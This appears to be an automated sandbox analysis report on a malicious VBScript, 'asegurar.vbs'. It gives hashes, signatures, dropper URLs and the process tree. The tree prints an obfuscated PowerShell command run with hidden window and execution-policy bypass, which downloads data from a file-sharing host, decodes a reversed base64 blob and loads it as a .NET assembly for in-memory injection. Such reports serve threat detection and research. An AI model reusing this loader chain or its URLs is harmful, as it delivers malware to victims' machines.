Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    25-11-2024 07:09

General

  • Target

    asegurar.vbs

  • Size

    139KB

  • MD5

    b6a19737eef49bc1fda3686ea04fefd2

  • SHA1

    e4f14e237fcd865694ce29862f58c063c0efe995

  • SHA256

    93db398a854042d2a23e61cd308a05d21fb85a6b5c28206c585a6221ac583cd6

  • SHA512

    03145176ca0d828034a4c6907213bcf6478a64134a9fd7a79026ea5ae250dc79d43da1d0cb005e18d0be4bb46373d36302f7369bfc5457be745ba3f50072e887

  • SSDEEP

    3072:boU4gHKIuQzOTbEeqZfCPgyoL4EairFgt5pJGwm:bLKAubqZTyo9

Score
10/10

Malware Config

  • Extracted

    Language
    ps1

    Deobfuscated

    URLs

    • ps1.dropper

      https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

    • exe.dropper

      https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\asegurar.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2104
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2928
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('RviimageUrl = i8xhttps:'+'//1017.filemail.com/api/file/get?f'+'ileke'+'y=2Aa_bWo9Reu45t7BU1kVgsd9p'+'T9pgSSlvStGrnTICfFhmTKj3L'+'C6SQtIcOc_T35w&pk_vid=fd4f614bb209c'+'62c1730945176a0904f '+'i8x;RviwebClient'+' = New-Objec'+'t System.Net.WebClient'+';RviimageBytes = RviwebClient.DownloadData(RviimageUrl);RviimageText = [System.Text.Encoding]::U'+'TF8.GetString'+'(Rvii'+'mageBytes);RvistartFl'+'ag = i8x<<BASE64_START>>i8x'+';RviendF'+'lag = i8x<<BAS'+'E64_END>>i8x;RvistartIndex = RviimageText.IndexOf(Rvistar'+'tFlag);RviendIndex = RviimageText.IndexOf(Rvien'+'dFlag);RvistartIndex -ge 0 -and Rvi'+'endIndex -gt RvistartIndex;RvistartIndex += RvistartFlag.Length;Rvi'+'base64Length = RviendIndex - RvistartIndex;Rvibase64Command = '+'RviimageTe'+'xt.Substring(RvistartIndex, Rvibase64Length);Rvibase'+'64Reversed '+'= -join ('+'Rvibase64Command.ToCharArray() TFX ForEach-Object { Rvi_ })[-1..-(Rviba'+'se64Com'+'mand.Length)'+'];RvicommandBytes = [System.Convert]::FromBase64String(Rvibase6'+'4Reversed);RviloadedAssembly = [System.Refl'+'ection.Assembly]::Load(RvicommandBytes);RvivaiMethod = ['+'dn'+'lib.IO.Home].GetMethod(i8xVAIi8x);RvivaiMethod.Invoke(Rvinull, @('+'i8x0/3xQbu/d/ee.etsap//:sptthi8x, i8xdesativadoi8x, i8xde'+'sativadoi8x, i8xdesativadoi8x, i8xAddInProcess32i8x, i8x'+'desativadoi8x, '+'i8xdesativa'+'doi8x,i8xdesativadoi8x,i8xdesativadoi8x,i8xdesativadoi8x,i8xdesativadoi8x,i8xdesativadoi8x'+',i8x1i8x'+',i8xdesativadoi8x));') -rEplacE([ChAR]84+[ChAR]70+[ChAR]88),[ChAR]124 -CRePLaCE 'i8x',[ChAR]39-CRePLaCE ([ChAR]82+[ChAR]118+[ChAR]105),[ChAR]36) | . ( $Env:comSPeC[4,15,25]-JoiN'')"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3060

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    d6a4afca558ae2105b3a196764d6a175

    SHA1

    74539409505e5b38ba3eaa293e93f76bdf76eaea

    SHA256

    f0c4dad558e1ede40b896fb738470fa186f53b8aa1d6835f3bd22c71b18165d0

    SHA512

    8dc2a874bd6f0610ca5cb2d33591ace4cf369b59c0f451120c9446f42dff8e7bf017eb489f58d37f2e1f9376b3836127723ae94d7038adc14150240f28a608a3

  • memory/2928-4-0x000007FEF587E000-0x000007FEF587F000-memory.dmp

    Filesize

    4KB

  • memory/2928-5-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

    Filesize

    2.9MB

  • memory/2928-6-0x0000000002720000-0x0000000002728000-memory.dmp

    Filesize

    32KB

  • memory/2928-8-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

    Filesize

    9.6MB

  • memory/2928-7-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

    Filesize

    9.6MB

  • memory/2928-9-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

    Filesize

    9.6MB

  • memory/2928-10-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

    Filesize

    9.6MB

  • memory/2928-16-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

    Filesize

    9.6MB